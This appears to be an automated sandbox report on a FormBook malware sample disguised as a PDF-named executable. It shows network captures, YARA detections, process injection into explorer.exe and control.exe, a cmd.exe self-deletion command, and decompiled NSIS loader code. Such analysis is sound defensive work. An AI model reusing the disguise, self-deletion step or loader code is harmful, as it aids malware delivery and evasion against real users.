                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:23:12.111870050 CEST6617INHTTP/1.1 200 OK
                                                                      Content-Type: text/html; charset=utf-8
                                                                      x-ua-compatible: IE=edge
                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                      Date: Thu, 08 Apr 2021 11:23:12 GMT
                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Oq+MhZLqXn/lPJa2HbfaPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Server: ESF
                                                                      X-XSS-Protection: 0
                                                                      X-Content-Type-Options: nosniff
                                                                      Set-Cookie: NID=213=Q3aVk287agnix_VFlLOZ9f8yZ4NKvZ3Gx5T2uq5mhBEDndQJtvlbSmgVWdWVA_Limzw7UVlmkJM_oISIIEOzBYUYzRN8LDbRdzqogH-Cod8rdzxLYiDXnWMd0mCWh91iRVLe-oo4zLEtKedf1mnoB2xzK3tMk489BX8pYT_Q7Ho; expires=Fri, 08-Oct-2021 11:23:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                      Accept-Ranges: none
                                                                      Vary: Accept-Encoding
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 4f 71 2b 4d 68 5a 4c 71 58 6e 2f 6c 50 4a 61 32 48 62 66 61 50 67 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 22 45 50 31 79 6b 64 22 3a 5b 22 2f 5f 2f 2a 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73
                                                                      Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/LocalBusiness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="Oq+MhZLqXn/lPJa2HbfaPg">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.google.com","EP1ykd":["/_/*","/local/business
                                                                      Apr 8, 2021 13:23:12.111903906 CEST6619INData Raw: 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 2f 2a 22 2c 22 2f 70 6f 73 74 73 2f 6c 2f 3a 6c 69 73 74 69 6e 67 49 64 22 2c 22 2f 72 65 73 74 61 75 72 61 6e 74 73 22 2c 22 2f 72 65 73 74 61 75 72 61 6e 74 73 2f 2a 22 2c 22 2f 77 65 62 73
                                                                      Data Ascii: ","/local/business/*","/posts/l/:listingId","/restaurants","/restaurants/*","/website/_/*","/website/demo","/website/demo/","/website/demo/*"],"FdrFJe":"-5299321465279713427","Im6cmf":"/_/GeoMerchantPrestoSiteUi","LVIXXb":1,"LoQv7e":true,"MT7f
                                                                      Apr 8, 2021 13:23:12.111923933 CEST6620INData Raw: 74 6f 53 69 74 65 55 69 22 2c 22 71 79 61 6f 64 63 22 3a 66 61 6c 73 65 2c 22 71 79 6d 56 65 22 3a 22 5a 62 6c 5f 4b 69 48 7a 37 37 42 77 79 4d 4b 38 6f 43 34 6e 52 49 71 34 45 4a 34 22 2c 22 72 74 51 43 78 63 22 3a 2d 31 32 30 2c 22 72 76 4f 6c
                                                                      Data Ascii: toSiteUi","qyaodc":false,"qymVe":"Zbl_KiHz77BwyMK8oC4nRIq4EJ4","rtQCxc":-120,"rvOlFd":"PAGE_SOURCE_UNKNOWN","tHwb2":false,"v9NS6b":"71924320579921992","vVkaEb":"","vXmutd":"%.@.\"CH\",\"ZZ\",\"uSDeCA\\u003d\\u003d\"]\n","w2btAe":"%.@.null,null
                                                                      Apr 8, 2021 13:23:12.111938953 CEST6621INData Raw: 21 31 3b 76 61 72 20 65 3d 62 2e 64 65 66 61 75 6c 74 56 69 65 77 3b 69 66 28 65 26 26 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 26 26 28 65 3d 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 63 29 2c 22 30 70 78 22 3d 3d 65
                                                                      Data Ascii: !1;var e=b.defaultView;if(e&&e.getComputedStyle&&(e=e.getComputedStyle(c),"0px"==e.height||"0px"==e.width||"hidden"==e.visibility&&!g))return!1;if(!c.getBoundingClientRect)return!0;e=c.getBoundingClientRect();c=e.left+a.pageXOffset;g=e.top+a.
                                                                      Apr 8, 2021 13:23:12.111954927 CEST6623INData Raw: 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6f 6c 6f 72 3a 23 32 30 32 31 32 34 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c
                                                                      Data Ascii: eight:100%;overflow:hidden;color:#202124;font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif;margin:0;text-size-adjust:100%}textarea{font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif}a{text-decoration:none;color:#1967d2}img{borde
                                                                      Apr 8, 2021 13:23:12.112061024 CEST6624INData Raw: 74 79 3a 31 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 61 75 74 6f 7d 2e 77 37 57 49 47 62 20 2e 53 56 70 50 63 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 70 78 29 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29
                                                                      Data Ascii: ty:1;pointer-events:auto}.w7WIGb .SVpPcd{transform:translateY(-5px) rotate(-45deg)}.w7WIGb .y5Bz3{opacity:0}.w7WIGb .ihSjwf{transform:translateY(5px) rotate(45deg)}@keyframes quantumWizBoxInkSpread{0%{transform:translate(-50%,-50%) scale(.2)}t
                                                                      Apr 8, 2021 13:23:12.112117052 CEST6625INData Raw: 44 75 75 62 20 61 3a 68 6f 76 65 72 2c 2e 65 33 44 75 75 62 20 61 3a 6c 69 6e 6b 2c 2e 65 33 44 75 75 62 20 61 3a 76 69 73 69 74 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 61 37 33 65 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 48 51 38 79 66
                                                                      Data Ascii: Duub a:hover,.e3Duub a:link,.e3Duub a:visited{background:#1a73e8;color:#fff}.HQ8yf,.HQ8yf a{color:#1a73e8}.UxubU,.UxubU a{color:#fff}.ZFr60d{position:absolute;top:0;right:0;bottom:0;left:0;background-color:transparent}.O0WRkf.u3bW4e .ZFr60d{ba
                                                                      Apr 8, 2021 13:23:12.112144947 CEST6627INData Raw: 2d 69 6d 61 67 65 3a 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 69 72 63 6c 65 20 66 61 72 74 68 65 73 74 2d 73 69 64 65 2c 72 67 62 61 28 32 36 2c 31 31 35 2c 32 33 32 2c 30 2e 31 36 31 29 2c 72 67 62 61 28 32 36 2c 31 31 35 2c 32 33 32
                                                                      Data Ascii: -image:radial-gradient(circle farthest-side,rgba(26,115,232,0.161),rgba(26,115,232,0.161) 80%,rgba(26,115,232,0) 100%)}.e3Duub .Vwe4Vb{background-image:radial-gradient(circle farthest-side,rgba(255,255,255,0.322),rgba(255,255,255,0.322) 80%,rg
                                                                      Apr 8, 2021 13:23:12.112226009 CEST6628INData Raw: 2c 30 2e 32 2c 31 29 20 2c 6d 61 78 2d 68 65 69 67 68 74 20 2e 32 73 20 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 30 2c 30 2e 30 2c 30 2e 32 2c 31 29 20 2c 6f 70 61 63 69 74 79 20 2e 30 35 73 20 6c 69 6e 65 61 72 2c 74 6f 70 20 2e 32 73 20
                                                                      Data Ascii: ,0.2,1) ,max-height .2s cubic-bezier(0.0,0.0,0.2,1) ,opacity .05s linear,top .2s cubic-bezier(0.0,0.0,0.2,1)}.JPdR6b.jVwmLb{max-height:56px;opacity:0}.JPdR6b.CAwICe{overflow:hidden}.JPdR6b.oXxKqf{transition:none}.z80M1{color:#222;cursor:point
                                                                      Apr 8, 2021 13:23:12.112243891 CEST6630INData Raw: 77 61 72 64 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 69 72 63 6c 65 20 66 61 72 74 68 65 73 74 2d 73 69 64 65 2c 23 62 64 63 31 63 36 2c 23 62 64 63 31 63 36 20 38 30 25 2c 72 67
                                                                      Data Ascii: wards;background-image:radial-gradient(circle farthest-side,#bdc1c6,#bdc1c6 80%,rgba(189,193,198,0) 100%);background-size:cover;opacity:1;top:0;left:0}.J0XlZe{color:inherit;line-height:40px;padding:0 6px 0 1em}.a9caSc{color:inherit;direction:l
                                                                      Apr 8, 2021 13:23:12.124249935 CEST6631INData Raw: 66 6f 72 6d 3a 73 63 61 6c 65 58 28 30 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 35 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 35 29 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 7d 7d 2e 46
                                                                      Data Ascii: form:scaleX(0)}50%{transform:scaleX(5)}to{transform:scaleX(5) translateX(100%)}}.FKF6mc,.FKF6mc:focus{display:block;outline:none;text-decoration:none}.FKF6mc:visited{fill:inherit;stroke:inherit}.U26fgb.u3bW4e{outline:1px solid transparent}.C0o


                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:13:21:19
                                                                      Start date:08/04/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x7ffabd480000
                                                                      File size:397431 bytes
                                                                      MD5 hash:98F9EA244308BB5969EA3C302C32EFCD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:13:21:20
                                                                      Start date:08/04/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x7ffabd480000
                                                                      File size:397431 bytes
                                                                      MD5 hash:98F9EA244308BB5969EA3C302C32EFCD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:13:21:25
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:13:21:38
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\SysWOW64\control.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                                      Imagebase:0xe70000
                                                                      File size:114688 bytes
                                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:13:21:43
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:13:21:43
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >

                                                                        Executed Functions

                                                                        C-Code - Quality: 86%
                                                                        			_entry_() {
                                                                        				struct _SHFILEINFOA _v356;
                                                                        				long _v372;
                                                                        				char _v380;
                                                                        				int _v396;
                                                                        				CHAR* _v400;
                                                                        				signed int _v404;
                                                                        				signed int _v408;
                                                                        				char _v416;
                                                                        				intOrPtr _v424;
                                                                        				intOrPtr _t31;
                                                                        				void* _t36;
                                                                        				CHAR* _t41;
                                                                        				signed int _t43;
                                                                        				CHAR* _t46;
                                                                        				signed int _t48;
                                                                        				int _t52;
                                                                        				signed int _t56;
                                                                        				void* _t78;
                                                                        				CHAR* _t89;
                                                                        				signed int _t90;
                                                                        				void* _t91;
                                                                        				CHAR* _t96;
                                                                        				signed int _t97;
                                                                        				signed int _t99;
                                                                        				signed char* _t103;
                                                                        				CHAR* _t105;
                                                                        				signed int _t106;
                                                                        				void* _t108;
                                                                        
                                                                        				_t99 = 0;
                                                                        				_v372 = 0;
                                                                        				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                        				_v380 = 0x20;
                                                                        				__imp__#17();
                                                                        				__imp__OleInitialize(0); // executed
                                                                        				 *0x7a3030 = _t31;
                                                                        				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
                                                                        				E004059BF(0x7a2780, "NSIS Error");
                                                                        				_t89 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                        				GetTempPathA(0x400, _t89);
                                                                        				_t36 = E00403116(_t108);
                                                                        				_t109 = _t36;
                                                                        				if(_t36 != 0) {
                                                                        					L2:
                                                                        					_t96 = "\"C:\\Users\\jones\\Desktop\\RFQ_AP65425652_032421 isu-isu,pdf.exe\" ";
                                                                        					DeleteFileA(_t96); // executed
                                                                        					E004059BF(_t96, GetCommandLineA());
                                                                        					 *0x7a2f80 = GetModuleHandleA(0);
                                                                        					_t41 = _t96;
                                                                        					if("\"C:\\Users\\jones\\Desktop\\RFQ_AP65425652_032421 isu-isu,pdf.exe\" " == 0x22) {
                                                                        						_v404 = 0x22;
                                                                        						_t41 =  &M007A9001;
                                                                        					}
                                                                        					_t43 = CharNextA(E004054F7(_t41, _v404));
                                                                        					_v408 = _t43;
                                                                        					while(1) {
                                                                        						_t91 =  *_t43;
                                                                        						_t112 = _t91;
                                                                        						if(_t91 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t91 - 0x20;
                                                                        						if(_t91 != 0x20) {
                                                                        							L7:
                                                                        							__eflags =  *_t43 - 0x22;
                                                                        							_v404 = 0x20;
                                                                        							if( *_t43 == 0x22) {
                                                                        								_t43 = _t43 + 1;
                                                                        								__eflags = _t43;
                                                                        								_v404 = 0x22;
                                                                        							}
                                                                        							__eflags =  *_t43 - 0x2f;
                                                                        							if( *_t43 != 0x2f) {
                                                                        								L17:
                                                                        								_t43 = E004054F7(_t43, _v404);
                                                                        								__eflags =  *_t43 - 0x22;
                                                                        								if(__eflags == 0) {
                                                                        									_t43 = _t43 + 1;
                                                                        									__eflags = _t43;
                                                                        								}
                                                                        								continue;
                                                                        							} else {
                                                                        								_t43 = _t43 + 1;
                                                                        								__eflags =  *_t43 - 0x53;
                                                                        								if( *_t43 == 0x53) {
                                                                        									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
                                                                        									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
                                                                        										_t99 = _t99 | 0x00000002;
                                                                        										__eflags = _t99;
                                                                        									}
                                                                        								}
                                                                        								__eflags =  *_t43 - 0x4352434e;
                                                                        								if( *_t43 == 0x4352434e) {
                                                                        									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
                                                                        									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
                                                                        										_t99 = _t99 | 0x00000004;
                                                                        										__eflags = _t99;
                                                                        									}
                                                                        								}
                                                                        								__eflags =  *(_t43 - 2) - 0x3d442f20;
                                                                        								if( *(_t43 - 2) == 0x3d442f20) {
                                                                        									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
                                                                        									__eflags = _t43 + 2;
                                                                        									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t43 + 2);
                                                                        									L22:
                                                                        									_t46 = E00402C37(_t112, _t99); // executed
                                                                        									_t105 = _t46;
                                                                        									if(_t105 != 0) {
                                                                        										L32:
                                                                        										E00403501();
                                                                        										__imp__OleUninitialize();
                                                                        										if(_t105 == 0) {
                                                                        											__eflags =  *0x7a3014;
                                                                        											if( *0x7a3014 != 0) {
                                                                        												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
                                                                        												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
                                                                        												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
                                                                        												__eflags = _t106;
                                                                        												if(_t106 != 0) {
                                                                        													__eflags = _t97;
                                                                        													if(_t97 != 0) {
                                                                        														__eflags = _t90;
                                                                        														if(_t90 != 0) {
                                                                        															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
                                                                        															__eflags = _t56;
                                                                        															if(_t56 != 0) {
                                                                        																 *_t97(0, "SeShutdownPrivilege",  &_v400);
                                                                        																_v416 = 1;
                                                                        																_v404 = 2;
                                                                        																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        												_t52 = ExitWindowsEx(2, 0);
                                                                        												__eflags = _t52;
                                                                        												if(_t52 == 0) {
                                                                        													E00401410(9);
                                                                        												}
                                                                        											}
                                                                        											_t48 =  *0x7a302c;
                                                                        											__eflags = _t48 - 0xffffffff;
                                                                        											if(_t48 != 0xffffffff) {
                                                                        												_v396 = _t48;
                                                                        											}
                                                                        											ExitProcess(_v396);
                                                                        										}
                                                                        										E004052BF(_t105, 0x200010);
                                                                        										ExitProcess(2);
                                                                        									}
                                                                        									if( *0x7a2f94 == _t46) {
                                                                        										L31:
                                                                        										 *0x7a302c =  *0x7a302c | 0xffffffff;
                                                                        										_v396 = E00403526();
                                                                        										goto L32;
                                                                        									}
                                                                        									_t103 = E004054F7(_t96, _t46);
                                                                        									while(_t103 >= _t96) {
                                                                        										__eflags =  *_t103 - 0x3d3f5f20;
                                                                        										if(__eflags == 0) {
                                                                        											break;
                                                                        										}
                                                                        										_t103 = _t103 - 1;
                                                                        										__eflags = _t103;
                                                                        									}
                                                                        									_t116 = _t103 - _t96;
                                                                        									_t105 = "Error launching installer";
                                                                        									if(_t103 < _t96) {
                                                                        										lstrcatA(_t89, "~nsu.tmp\\");
                                                                        										CreateDirectoryA(_t89, 0);
                                                                        										_v404 = _v404 & 0x00000000;
                                                                        										do {
                                                                        											 *0x79d940 = 0x22;
                                                                        											lstrcatA(0x79d940, _t89);
                                                                        											lstrcatA(0x79d940, "Au_.exe");
                                                                        											DeleteFileA(0x79d941);
                                                                        											if(_t105 == 0) {
                                                                        												goto L43;
                                                                        											}
                                                                        											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
                                                                        												goto L32;
                                                                        											}
                                                                        											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
                                                                        												E00405707(0x79d941, 0);
                                                                        												if("C:\\Users\\jones\\AppData\\Local\\Temp" == 0) {
                                                                        													E00405513(0x79e140);
                                                                        												} else {
                                                                        													E004059BF(0x79e140, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                        												}
                                                                        												lstrcatA(0x79d940, "\" ");
                                                                        												lstrcatA(0x79d940, _v400);
                                                                        												lstrcatA(0x79d940, " _?=");
                                                                        												lstrcatA(0x79d940, 0x79e140);
                                                                        												E004054CC(0x79d940);
                                                                        												_t78 = E00405247(0x79d940, _t89);
                                                                        												if(_t78 != 0) {
                                                                        													CloseHandle(_t78);
                                                                        													_t105 = 0;
                                                                        												}
                                                                        											}
                                                                        											L43:
                                                                        											"Au_.exe" =  &("Au_.exe"[1]);
                                                                        											_v404 = _v404 + 1;
                                                                        										} while (_v404 < 0x1a);
                                                                        										goto L32;
                                                                        									}
                                                                        									 *_t103 =  *_t103 & 0x00000000;
                                                                        									_t104 =  &(_t103[4]);
                                                                        									if(E004055AC(_t116,  &(_t103[4])) == 0) {
                                                                        										goto L32;
                                                                        									}
                                                                        									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                                        									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                                        									_t105 = 0;
                                                                        									goto L31;
                                                                        								}
                                                                        								goto L17;
                                                                        							}
                                                                        						} else {
                                                                        							goto L6;
                                                                        						}
                                                                        						do {
                                                                        							L6:
                                                                        							_t43 = _t43 + 1;
                                                                        							__eflags =  *_t43 - 0x20;
                                                                        						} while ( *_t43 == 0x20);
                                                                        						goto L7;
                                                                        					}
                                                                        					goto L22;
                                                                        				}
                                                                        				GetWindowsDirectoryA(_t89, 0x3fb);
                                                                        				lstrcatA(_t89, "\\Temp");
                                                                        				if(E00403116(_t109) == 0) {
                                                                        					goto L32;
                                                                        				}
                                                                        				goto L2;
                                                                        			}































                                                                        0x00403153
                                                                        0x00403156
                                                                        0x0040315a
                                                                        0x0040315f
                                                                        0x00403164
                                                                        0x0040316b
                                                                        0x00403171
                                                                        0x00403187
                                                                        0x00403197
                                                                        0x0040319c
                                                                        0x004031a7
                                                                        0x004031ad
                                                                        0x004031b2
                                                                        0x004031b4
                                                                        0x004031da
                                                                        0x004031da
                                                                        0x004031e0
                                                                        0x004031ee
                                                                        0x00403202
                                                                        0x00403207
                                                                        0x00403209
                                                                        0x0040320b
                                                                        0x00403210
                                                                        0x00403210
                                                                        0x00403220
                                                                        0x00403226
                                                                        0x0040328f
                                                                        0x0040328f
                                                                        0x00403291
                                                                        0x00403293
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040322c
                                                                        0x0040322f
                                                                        0x00403237
                                                                        0x00403237
                                                                        0x0040323a
                                                                        0x0040323f
                                                                        0x00403241
                                                                        0x00403241
                                                                        0x00403242
                                                                        0x00403242
                                                                        0x00403247
                                                                        0x0040324a
                                                                        0x0040327f
                                                                        0x00403284
                                                                        0x00403289
                                                                        0x0040328c
                                                                        0x0040328e
                                                                        0x0040328e
                                                                        0x0040328e
                                                                        0x00000000
                                                                        0x0040324c
                                                                        0x0040324c
                                                                        0x0040324d
                                                                        0x00403250
                                                                        0x00403258
                                                                        0x0040325b
                                                                        0x0040325d
                                                                        0x0040325d
                                                                        0x0040325d
                                                                        0x0040325b
                                                                        0x00403260
                                                                        0x00403266
                                                                        0x0040326e
                                                                        0x00403271
                                                                        0x00403273
                                                                        0x00403273
                                                                        0x00403273
                                                                        0x00403271
                                                                        0x00403276
                                                                        0x0040327d
                                                                        0x00403297
